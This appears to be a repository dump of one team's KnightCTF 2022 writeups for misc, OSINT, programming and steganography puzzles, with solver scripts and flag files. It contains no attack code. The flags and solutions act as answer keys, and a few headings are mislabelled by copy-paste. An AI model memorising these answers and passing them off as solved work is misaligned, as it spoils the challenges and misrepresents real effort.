https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Misc/Look Closely/settings.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Misc/Misc.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Misc/Misc.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Misc/README.md:
--------------------------------------------------------------------------------
1 | # KnightCTF | Misc
2 |
3 | 
4 |
--------------------------------------------------------------------------------
/2022/KnightCTF/Misc/The Hungry Dragon/README.md:
--------------------------------------------------------------------------------
1 | # The Hungry Dragon
2 |
3 | **Category**: Misc \
4 | **Points**: 50
5 |
6 | ## Description
7 |
8 | > Last night, the Knight Squad members were having relax and enjoying doughnuts and sweets together on the roof of their castle. Suddenly, a hungry dragon attacked on them and ate some of their food. The Knights were angry and then they all attacked on the dragon and managed to capture it. And now they are handing over the dragon to you. Can you figure out how many doughnuts and sweets were eaten up by the dragon?
9 |
10 | 
11 | ## Solution
12 |
13 | Given file is [The Hungry Dragon.3mf](The%20Hungry%20Dragon.3mf).
14 |
15 | I searched about `.3mf` file and I got that It's a 3D model.
16 |
17 | Open the 3d model with https://3dviewer.net/
18 |
19 | 
20 |
21 | I zoomed inside the dragon and here I can see the eaten doughnuts and sweets.
22 |
23 | 
24 |
25 | Now, zoom-out and right-click on dragon and click on hide mesh now You can see all the eaten doughnuts and sweets.
26 |
27 | 
28 |
29 | # Flag is `KCTF{3_doughnut_and_11_sweet}`
30 |
31 |
32 |
--------------------------------------------------------------------------------
/2022/KnightCTF/Misc/The Hungry Dragon/The Hungry Dragon.3mf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Misc/The Hungry Dragon/The Hungry Dragon.3mf
--------------------------------------------------------------------------------
/2022/KnightCTF/Misc/The Hungry Dragon/dragon.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Misc/The Hungry Dragon/dragon.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Misc/The Hungry Dragon/hideDragon.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Misc/The Hungry Dragon/hideDragon.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Misc/The Hungry Dragon/insideDragon.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Misc/The Hungry Dragon/insideDragon.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Misc/The Hungry Dragon/que.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Misc/The Hungry Dragon/que.png
--------------------------------------------------------------------------------
/2022/KnightCTF/OSINT/Canada/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/OSINT/Canada/1.png
--------------------------------------------------------------------------------
/2022/KnightCTF/OSINT/Canada/1que.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/OSINT/Canada/1que.png
--------------------------------------------------------------------------------
/2022/KnightCTF/OSINT/Canada/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/OSINT/Canada/2.png
--------------------------------------------------------------------------------
/2022/KnightCTF/OSINT/Canada/README.md:
--------------------------------------------------------------------------------
1 | # Canada Server
2 |
3 | **Category**: OSINT \
4 | **Points**: 50
5 |
6 | ## Description
7 |
8 | > Our sponsor NS TechValley had some problems last year. Their Canada server was not working as expected. Can you find the IP address of that server?
9 |
10 | 
11 | ## Solution
12 |
13 | Just google `NS TechValley Canada server was not working `
14 |
15 | 
16 |
17 | 
18 |
19 | # Flag is `KCTF{192.99.167.83}`
20 |
21 |
22 |
--------------------------------------------------------------------------------
/2022/KnightCTF/OSINT/Canada/flag.txt:
--------------------------------------------------------------------------------
1 | KCTF{192.99.167.83}
2 |
--------------------------------------------------------------------------------
/2022/KnightCTF/OSINT/Explosion In Front Of Bank Of Spain/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/OSINT/Explosion In Front Of Bank Of Spain/1.png
--------------------------------------------------------------------------------
/2022/KnightCTF/OSINT/Explosion In Front Of Bank Of Spain/Explosion_In_Front_Of_Bank_Of_Spain.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/OSINT/Explosion In Front Of Bank Of Spain/Explosion_In_Front_Of_Bank_Of_Spain.png
--------------------------------------------------------------------------------
/2022/KnightCTF/OSINT/Explosion In Front Of Bank Of Spain/README.md:
--------------------------------------------------------------------------------
1 | # Canada Server
2 |
3 | **Category**: OSINT \
4 | **Points**: 100
5 |
6 | ## Description
7 |
8 | > One of my friend sent me the picture and told me that, there was an explotion in front of the Bank of Spain by some robbers a few days ago. After hearing that, I googled about incident. But I discovered that, The picture he gave is not the picture of Bank Of Spain. So, now I want to know the exact location of the picture so that I can know about the incident of that explotion. Can you please help me to find that place? Please send me the coordinates of that location if you can figure it out.
9 |
10 | 
11 | ## Solution
12 | Given file is [Explosion_In_Front_Of_Bank_Of_Spain.png](Explosion_In_Front_Of_Bank_Of_Spain.png)
13 |
14 | Just google `money heist bank of spain location`
15 |
16 | Got a [result](https://www.klook.com/en-IN/blog/money-heist-film-locations/#:~:text=Rio%E2%80%99s%20illegal%20detention.-,5.%20Ministerio%20de%20Fomento%20(Ministry%20of%20Public%20Works%20and%20Transport)%20as%20the%20Bank%20of%20Spain,-Also%2C%20the%20team)
17 |
18 | The real name is `Ministerio de Transportes, Movilidad y Agenda Urbana`.
19 |
20 | search it on google map.
21 |
22 | The correct coordinates is in end of the google map url.
23 |
24 | 
25 |
26 | # Flag is `KCTF{40.4442164,-3.6936083}`
27 |
28 |
29 |
--------------------------------------------------------------------------------
/2022/KnightCTF/OSINT/Explosion In Front Of Bank Of Spain/flag.txt:
--------------------------------------------------------------------------------
1 | KCTF{40.4442164,-3.6936083}
2 |
--------------------------------------------------------------------------------
/2022/KnightCTF/OSINT/Explosion In Front Of Bank Of Spain/que.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/OSINT/Explosion In Front Of Bank Of Spain/que.png
--------------------------------------------------------------------------------
/2022/KnightCTF/OSINT/Find The Camera/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/OSINT/Find The Camera/1.png
--------------------------------------------------------------------------------
/2022/KnightCTF/OSINT/Find The Camera/Bus.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/OSINT/Find The Camera/Bus.png
--------------------------------------------------------------------------------
/2022/KnightCTF/OSINT/Find The Camera/README.md:
--------------------------------------------------------------------------------
1 | # Find The Camera
2 |
3 | **Category**: OSINT \
4 | **Points**: 100
5 |
6 | ## Description
7 |
8 | > Can you find the manufacturer and the model number of the camera that took the picture of this bus?
9 | Note: The whole flag is in Upper Case letters and replace any special character or space with underscores.
10 |
11 | 
12 | ## Solution
13 | Given file is [Bus.png](Bus.png)
14 |
15 | I got a username/copyright tag on image `JenCH012`
16 |
17 | By doing many googling I got the image
18 | https://fotobus.msk.ru/photo/267442/?vid=204172
19 |
20 | In it's Camera Settings I got the model number
21 |
22 | 
23 |
24 | By googling the model number and I got that Its brand is sony
25 |
26 |
27 | # Flag is `KCTF{SONY_DSC_S980}`
28 |
29 |
30 |
--------------------------------------------------------------------------------
/2022/KnightCTF/OSINT/Find The Camera/que.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/OSINT/Find The Camera/que.png
--------------------------------------------------------------------------------
/2022/KnightCTF/OSINT/OSINT.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/OSINT/OSINT.png
--------------------------------------------------------------------------------
/2022/KnightCTF/OSINT/README.md:
--------------------------------------------------------------------------------
1 | # KnightCTF | OSINT
2 |
3 | 
4 |
--------------------------------------------------------------------------------
/2022/KnightCTF/Programming/Find The Number/flag.txt:
--------------------------------------------------------------------------------
1 | KCTF{1.9999999701976776}
2 |
--------------------------------------------------------------------------------
/2022/KnightCTF/Programming/Find The Number/sol.py:
--------------------------------------------------------------------------------
1 | def G_Sum(n):
2 | if n < 0 :
3 | return 0
4 | return 1/(pow(2,n))+G_Sum(n-1)
5 |
6 | print("KCTF{"+str(G_Sum(25))+"}")
7 |
--------------------------------------------------------------------------------
/2022/KnightCTF/Programming/Keep Calculating/flag.txt:
--------------------------------------------------------------------------------
1 | KCTF{2666664}
2 |
--------------------------------------------------------------------------------
/2022/KnightCTF/Programming/Keep Calculating/sol.py:
--------------------------------------------------------------------------------
1 | x=1
2 | y=x+1
3 | xy=12
4 | answer=0
5 | for i in range(666):
6 | answer += (x*y) + int(str(x)+str(y))
7 | x+=1
8 | print("KCTF{"+str(answer)+"}")
9 |
--------------------------------------------------------------------------------
/2022/KnightCTF/Programming/Programming.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Programming/Programming.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Programming/README.md:
--------------------------------------------------------------------------------
1 | # KnightCTF | Programming
2 |
3 | 
4 |
--------------------------------------------------------------------------------
/2022/KnightCTF/Programming/Reverse The Answer/flag.txt:
--------------------------------------------------------------------------------
1 | KCTF{12252696}
2 |
--------------------------------------------------------------------------------
/2022/KnightCTF/Programming/Reverse The Answer/sol.py:
--------------------------------------------------------------------------------
1 | x=1
2 | answer = 0
3 |
4 | for i in range(543):
5 | calculation = (x*(x+1)) + (2 *(x + 1))
6 | reversed_calc = int(str(calculation)[::-1])
7 | if reversed_calc % 4 == 0:
8 | answer=answer+reversed_calc
9 | x+=1
10 |
11 | print("KCTF{"+str(answer)+"}")
12 |
--------------------------------------------------------------------------------
/2022/KnightCTF/Programming/Something In Common/flag.txt:
--------------------------------------------------------------------------------
1 | KCTF{24680}
2 |
3 |
--------------------------------------------------------------------------------
/2022/KnightCTF/Programming/Something In Common/sol.py:
--------------------------------------------------------------------------------
1 | import math
2 |
3 | a = 21525625
4 | b = 30135875
5 |
6 | def DigitSum(n):
7 | sum = 0
8 | for digit in str(n):
9 | sum += int(digit)
10 | return sum
11 |
12 | answer = DigitSum(math.gcd(a, b)) * 1234
13 | print("KCTF{"+str(answer)+"}")
14 |
--------------------------------------------------------------------------------
/2022/KnightCTF/Programming/Squre Sum/sol.py:
--------------------------------------------------------------------------------
1 | def sumSquare(n) :
2 | ans = []
3 | c = 0
4 | i = 1
5 | while i * i <= n :
6 | j = 1
7 | while(j * j <= n) :
8 | if (i * i + j * j == n) :
9 | print(i, "^2 + ", j , "^2" )
10 | c += 1
11 | if c == 3:
12 | ans.append(str(i))
13 | ans.append(str(j))
14 | j = j + 1
15 | i = i + 1
16 | return ans
17 | n = 25000
18 | num = sumSquare(n)
19 | print("\n\nKCTF{"+num[0]+","+num[1]+"}")
20 |
--------------------------------------------------------------------------------
/2022/KnightCTF/Programming/Squre Sum/sol.txt:
--------------------------------------------------------------------------------
1 | KCTF{90,130}
2 |
--------------------------------------------------------------------------------
/2022/KnightCTF/README.md:
--------------------------------------------------------------------------------
1 | # SquidCTF 2022
2 |
3 | **Site** : https://knightctf.com/
4 |
5 | **Rank** : 18 / 752
6 |
7 | 
8 |
9 |
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/FileD/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/FileD/1.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/FileD/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/FileD/2.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/FileD/README.md:
--------------------------------------------------------------------------------
1 | # FileD
2 |
3 | **Category**: Steganography \
4 | **Points**: 25
5 |
6 | ## Description
7 |
8 | > Can you see everything?
9 |
10 | 
11 | ## Solution
12 | Given file is [filed.kra](filed.kra)
13 |
14 | I searched about `.kra` file and I got that It's an image file created by Krita painting program.
15 |
16 | You can download Krita from https://krita.org/en/download/krita-desktop/
17 |
18 | Open the filed.kra file with Krita application.
19 |
20 | In it's Camera Settings I got the model number
21 |
22 | 
23 |
24 | Hide all the layers except `ctf.png` and got the flag.
25 |
26 | 
27 |
28 | # Flag is `KCTF{W00_n1ce_you_got_me}`
29 |
30 |
31 |
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/FileD/filed.kra:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/FileD/filed.kra
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/FileD/flag.txt:
--------------------------------------------------------------------------------
1 | KCTF{W00_n1ce_you_got_me}
2 |
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/FileD/que.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/FileD/que.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/Follow The White Rabbit/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/Follow The White Rabbit/1.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/Follow The White Rabbit/README.md:
--------------------------------------------------------------------------------
1 | # Follow The White Rabbit
2 |
3 | **Category**: Steganography \
4 | **Points**: 25
5 |
6 | ## Description
7 |
8 | > Will you choose to follow the white rabbit like NEO? THINK wisely or LOOK your path deeply before you take step.
9 |
10 | 
11 | ## Solution
12 | Given file is [whiterabbit.jpg](whiterabbit.jpg)
13 |
14 | I saw a morse code below the the rabbit
15 |
16 | Just decode it https://www.boxentriq.com/code-breaking/morse-code
17 |
18 | 
19 |
20 | # Flag is `KCTF{L0OKB4Y0UL34P}`
21 |
22 |
23 |
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/Follow The White Rabbit/flag.txt:
--------------------------------------------------------------------------------
1 | KCTF{L0OKB4Y0UL34P}
2 |
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/Follow The White Rabbit/que.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/Follow The White Rabbit/que.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/Follow The White Rabbit/whiterabbit.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/Follow The White Rabbit/whiterabbit.jpg
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/Follow/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/Follow/1.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/Follow/Follow.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/Follow/Follow.pdf
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/Follow/README.md:
--------------------------------------------------------------------------------
1 | # Follow
2 |
3 | **Category**: Steganography \
4 | **Points**: 25
5 |
6 | ## Description
7 |
8 | > Follow the rules ?
9 |
10 | 
11 | ## Solution
12 | Given file is [Follow.pdf](Follow.pdf)
13 |
14 | Open the pdf and a white text hidden in the pdf
15 |
16 | Just press Ctrl + A to reveal it
17 |
18 | 
19 |
20 | # Flag is `KCTF{This_is_the_real_flag}`
21 |
22 |
23 |
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/Follow/flag.txt:
--------------------------------------------------------------------------------
1 | KCTF{This_is_the_real_flag}
2 |
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/Follow/que.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/Follow/que.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/QR_Code_From_The_Future.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/QR_Code_From_The_Future.gif
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/README.md:
--------------------------------------------------------------------------------
1 | # QR Code From The Future
2 |
3 | **Category**: Steganography \
4 | **Points**: 25
5 |
6 | ## Description
7 |
8 | > The following file was found in a device from a crashed UFO. Can you solve that mystery?
9 |
10 | 
11 | ## Solution
12 | Given file is [QR_Code_From_The_Future.gif](QR_Code_From_The_Future.gif)
13 |
14 | 
15 |
16 | It's a gif made with lot of qr code images
17 |
18 | Run the code below to extract all images from the gif to img folder
19 |
20 | ```bash
21 | mkdir img && gm convert QR_Code_From_The_Future.gif -coalesce +adjoin ./img/%3d.png
22 | ```
23 |
24 | I used my qrcan tool(https://github.com/sky9262/qrcan)
25 |
26 | ```bash
27 | python3 qrcan.py ./img/
28 | ```
29 |
30 | Got `}pvznalq_bg_pvgngf_zbes_qriybir_gbt_rqbp_ED{SGPX`
31 |
32 | It looks like reversed rot13
33 |
34 | [Just decode with cyberchef.](https://gchq.github.io/CyberChef/#recipe=Reverse('Character')ROT13(true,true,false,13)&input=fXB2em5hbHFfYmdfcHZnbmdmX3piZXNfcXJpeWJpcl9nYnRfcnFicF9FRHtTR1BYCg)
35 |
36 | # Flag is `KCTF{QR_code_got_evolved_from_static_to_dynamic}`
37 |
38 |
39 |
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/flag.txt:
--------------------------------------------------------------------------------
1 | KCTF{QR_code_got_evolved_from_static_to_dynamic}
2 |
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 0.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 1.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 2.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 3.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 4.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 5.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 6.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 7.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 8.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 9.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 9.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 10.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 10.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 11.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 11.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 12.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 12.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 13.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 13.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 14.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 14.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 15.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 15.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 16.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 16.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 17.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 17.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 18.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 18.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 19.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 19.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 20.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 20.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 21.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 21.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 22.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 22.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 23.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 23.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 24.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 24.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 25.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 25.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 26.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 26.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 27.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 27.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 28.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 28.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 29.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 29.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 30.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 30.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 31.png:
--------------------------------------------------------------------------------
